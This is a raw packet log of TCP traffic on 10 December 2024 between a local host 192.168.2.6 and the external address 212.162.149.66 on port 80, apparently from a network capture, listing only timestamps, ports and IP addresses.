                                                                          Dec 10, 2024 13:53:13.812477112 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.812539101 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.812572956 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.819871902 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.819928885 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.819962025 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.820017099 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.828414917 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.828459024 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.828485012 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.828526020 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.836639881 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.836698055 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.836704969 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.836733103 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.878767967 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.878829956 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.951797962 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.951854944 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.951913118 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.951962948 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.954392910 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.954440117 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.954468966 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.954514027 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.959161997 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.959175110 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.959209919 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.959222078 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.964066982 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.964121103 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.964145899 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.964184999 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.968987942 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.969044924 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.969046116 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.969083071 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.973902941 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.973952055 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.973982096 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.974028111 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.978702068 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.978749037 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.978811979 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.978856087 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.983067989 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.983124971 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.983165979 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.983217001 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.987750053 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.987798929 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.987817049 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.987864017 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.992512941 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.992563009 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.992599964 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.992649078 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.997297049 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.997347116 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.997411013 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.997459888 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.002134085 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.002182007 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.002353907 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.002403975 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.006844044 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.006895065 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.006925106 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.006963968 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.011872053 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.011930943 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.012116909 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.012168884 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.015646935 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.015686989 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.015701056 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.015738010 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.019232035 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.019294024 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.019356966 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.019414902 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.023078918 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.023106098 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.023128033 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.023147106 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.026807070 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.026854992 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.026884079 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.026923895 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.030642986 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.030692101 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.030749083 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.030796051 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.034589052 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.034603119 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.034650087 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.038247108 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.038288116 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.038296938 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.038331985 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.071316004 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.071367979 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.071398020 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.071441889 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.073193073 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.073242903 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.143506050 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.143573046 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.143578053 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.143626928 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.144994974 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.145045042 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.145138979 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.145179987 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.148211956 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.148260117 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.148344994 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.148391008 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.150964022 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.151011944 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.151026964 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.151072979 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.153904915 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.153949022 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.154063940 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.154105902 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.156774044 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.156821966 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.156910896 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.156955004 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.159578085 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.159625053 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.159778118 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.159818888 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.162322998 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.162372112 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.162458897 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.162504911 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.165122986 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.165189028 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.165332079 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.165379047 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.167814970 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.167860985 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.167954922 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.168000937 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.170397043 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.170443058 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.170480013 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.170525074 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.173012018 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.173057079 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.173139095 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.173178911 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.175685883 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.175760984 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.175820112 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.175864935 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.178406954 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.178423882 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.178447962 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.178462982 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.179801941 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.179848909 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.179862976 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.179897070 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.182396889 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.182439089 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.182526112 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.182574034 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.185178041 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.185225010 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.185354948 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.185399055 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.187705994 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.187768936 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.187810898 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.187865973 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.190382957 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.190434933 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.190588951 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.190628052 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.193025112 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.193063974 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.193162918 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.193202972 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.195758104 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.195770025 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.195802927 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.198358059 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.198419094 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.198453903 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.198494911 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.200336933 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.200376034 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.200525999 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.200565100 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.202253103 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.202291965 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.202361107 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.202404022 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.204248905 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.204288960 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.204361916 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.204401970 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.206280947 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.206320047 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.206387043 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.206423998 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.208108902 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.208148956 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.208230019 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.208264112 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.210216999 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.210283041 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.210460901 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.210506916 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.212131023 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.212176085 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.212263107 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.212302923 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.214010000 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.214051962 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.214085102 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.214127064 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.215970039 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.216018915 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.216217041 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.216263056 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.217896938 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.217940092 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.218024969 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.218066931 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.219886065 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.219934940 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.220004082 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.220046043 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.221807003 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.221878052 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.221910954 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.221952915 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.223752975 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.223795891 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.223912954 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.223969936 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.225724936 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.225771904 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.225810051 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.225847006 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.335570097 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.335608006 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.335757017 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.336220026 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.336266994 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.336342096 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.336385965 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.337969065 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.338015079 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.338063955 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.338118076 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.339500904 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.339545965 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.339577913 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.339626074 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.341111898 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.341157913 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.341217041 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.341263056 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.342720032 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.342766047 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.343141079 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.343185902 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.344402075 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.344444990 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.344470978 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.344511986 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.345961094 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.346009970 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.346159935 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.346203089 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.347564936 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.347623110 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.347649097 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.347695112 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.349006891 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.349070072 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.349124908 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.349191904 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.350451946 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.350506067 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.350554943 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.350599051 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.351984024 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.352034092 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.352041960 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.352075100 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.353437901 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.353483915 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.353568077 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.353614092 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.354969025 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.355020046 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.355102062 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.355142117 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.356471062 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.356539011 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.356554985 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.356571913 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.357978106 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.358036041 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.358081102 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.358141899 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.359417915 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.359467030 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.359535933 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.359575033 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.360898972 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.360944986 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.361183882 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.361222982 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.362432003 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.362478018 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.362591982 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.362633944 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.363883972 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.363938093 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.363981962 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.364023924 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.365351915 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.365402937 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.365492105 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:14.365533113 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:14.366892099 CET8049850212.162.149.66192.168.2.6
